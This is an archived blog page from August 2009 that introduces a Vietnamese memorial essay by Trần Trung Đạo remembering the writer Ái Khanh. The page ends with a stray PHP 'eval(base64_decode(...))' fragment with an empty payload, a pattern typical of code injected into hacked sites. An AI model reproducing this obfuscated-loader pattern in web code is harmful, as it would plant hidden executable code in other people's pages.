Archive for August 22nd, 2009

Trần Trung Đạo: Người đi về hướng đông, hồn tôi nương ngọn sóng (Tưởng nhớ nhà văn Ái Khanh)

Trần Trung Đạo: Người đi về hướng đông, hồn tôi nương ngọn sóng (Tưởng nhớ nhà văn Ái Khanh)

(Hình: Anh Đỗ Xuân Hùng (trái), Trần Trung Đạo, chị Ái Khanh (áo dài trắng), chị Thanh Hiền (áo dài xanh) chụp 1997 tại Orlando) Tôi trở lại Orlando. Giọng bà Lucy, như con gái tôi đặt tên cho chiếc máy GPS dẫn đường, cất lên vẫn sai như

08.22.2009 | Ký-Truyện-Tùy Bút |

4 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>